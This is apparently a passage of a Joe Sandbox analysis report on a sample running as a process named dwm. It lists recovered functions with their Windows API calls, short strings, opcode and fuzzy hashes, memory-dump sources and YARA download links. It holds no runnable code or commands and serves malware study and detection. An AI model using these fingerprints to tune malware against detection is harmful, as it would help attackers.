                                                        • Instruction Fuzzy Hash: E381BF3360424186FF6CAB2594B939A73B0A7C5BC0F544515AA09C7796DB3BCA4DC33E
                                                        Function 000002BAAF219930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199B5
                                                        • GetLastError.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF2199ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF219A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002BAAF219AEF,?,?,?,000002BAAF2198B4,?,?,?,?,000002BAAF2194A5), ref: 000002BAAF219A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: a6bf6a94eddea89105b30db477d3daf9bee51736b7a005d7bcaf928fcac1f8de
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: E731C63335274091FE29DB02A82879973B8F748BA4F590625DD2D8B394DF39C54DC36A
                                                        Function 000002BAAF221CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: d0121da0eac36c6efb4a23c022dbfb35ac3b5afc2c8f350cd7495394a21f5874
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 1F118C32314B8086E7649B52F868719B3B0F788FE4F544225EA5EC77A4CF7AC908C761
                                                        Function 000002BAAF2131C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 9b4581ba7c1728fa510643aa63efff568e6099f6d452df6f50f91db6c1d52ff0
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 4F31A033701B5182EA79AF56A86836977B1FB54B80F044020DF8883B54EF3ADCA9C719
                                                        Function 000002BAAF211934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: 0bda700a449b738a7513a3e087965ece3026a7fc15e9c88ba9748331a614c350
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 63016D32704A4082EB28DB12A46875973B5F788BC4F484134DE9D83754DF3EC949C769
                                                        Function 000002BAAF213B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: ca1db09284835703f8126d1d30cbbd0ee1ec14c941f4e324781277f7f715831b
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: B2111776201B4086FF389B61E82C71A73B5AB48B55F040824CA4D87764EF3ECA4CC72A
                                                        Function 000002BAAF2119D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: f4a654ae187bbc2741a9c03123a6bc6add0e6934cdeefba99666c279163a0754
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: ABF04F3330468192EB348B25F8A87597770F744B88F848121DA4986958DF7EDA8DCB25
                                                        Function 000002BAAF21330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: fa13591aeca66546914b0c1e565b36f44d29ebdfc84e8b75ef3c4e37e678ddf1
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 32F08222304B8091EA288B13B9281197371AB48FD0F088131DE5A87B68CF3DCC89C719
                                                        Function 000002BAAF21A258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: a1c6838bf8565cfbc7161abdecf5326e6c79d494dbb047ffbf74450213791555
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: C8F08C63321A0082FF6C8F60E8AC3683370EB88B40F481419954BC6660CF3EC99CDB36
                                                        Function 000002BAAF220980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002BAAF2209C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002BAAF22093F,?,?,?,000002BAAF21E263), ref: 000002BAAF220A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002BAAF22093F,?,?,?,000002BAAF21E263), ref: 000002BAAF220B0A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 22628d253f4b2124741ef3d755309fd324007fa4989dfa84a4d75b1062aadd95
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: A881D13361065089FB68DB6488B87ED77B1F748B98F444115DE0AE77A1EB36844AC732
                                                        Function 000002BAAF215B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 452c4da48bc17cec2e35f21799188dc8555b2eac98ca7fdb2052e490eff5b469
                                                        • Instruction ID: c570d6d1b000993b898d88c015bb25e368b99221ccd65f3ac4dfc0790bec377e
                                                        • Opcode Fuzzy Hash: 452c4da48bc17cec2e35f21799188dc8555b2eac98ca7fdb2052e490eff5b469
                                                        • Instruction Fuzzy Hash: 06610C33119B44C6EB68CF15E46931AB7B0F388784F500155EA8E87BA8DB7EC548CF19
                                                        Function 000002BAAF221FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 7097b8acd0b530d4b0a9a6d0ff9f2f11ec16afe7dad8c1a911792a3322799ef8
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: CA118623A54A1101F75C1724D47E37973606B75374F044634AE76DA3E68B5B8E8DC133
                                                        Function 000002BAAF1F13D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 9d670050d6ab185e45e66283b4d120b581601cfb19ab76edf0a6d8a8a3486fc4
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 7F11CE73A40B1081F76C1228E45E3A93B706BF4774F480627EB76B66DADB1A8841C722
                                                        Function 000002BAAF213558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 7aaadda06542fe4e4acc22baabab240a0e73d413edf737f765fdd66a223f3998
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 59116A26300A8191FF389B25E82939A73B5F788780F500121DE49C3A94EF3ACD09C76E
                                                        Function 000002BAAF2114A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: d41a58d153652720a5ec27ddd0e6e873cf0f79565136c1956944f6c6c61b611d
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 8D011A33611B90C6E718DFA6E81829977B1F788F84F084425EA4A93728DF39C859C755
                                                        Function 000002BAAF212618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: 582f9027be96268d194dcb6bee9941c93b8b42454e5c21d2fe54859b00c74d0c
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: EF71813360078186EF7C9F2698683AA77B5F385784F450025ED4993B98DF36CA09C76E
                                                        Function 000002BAAF1ED178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: f0af33db4e1575e7fb6d00d73accf7bb8c0e10e1a2b89e4c6dbe87231cd6418d
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 9E616A6360064582FAAD9B19D15833EBFB4F791B80F14481BDB0A977A8DB3BC841C332
                                                        Function 000002BAAF212408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: e8639d5fbed36d3742fc3bb2bd07fadf728fb44a619c533cc13aa27e372503a6
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 5E518D3320878551EE7CDE25A1BC3AA7775F385780F440025EE4983B89DB3AC908D75E
                                                        Function 000002BAAF220724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 37d427d7877672c6359396deda68cdd5fe6c8c06a1101931b830fae45d784dc9
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 6141A033614A4482EB24DF25E8583AA77B1F798794F814021EE4DC7798EB39C549CB62
                                                        Function 000002BAAF21D7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
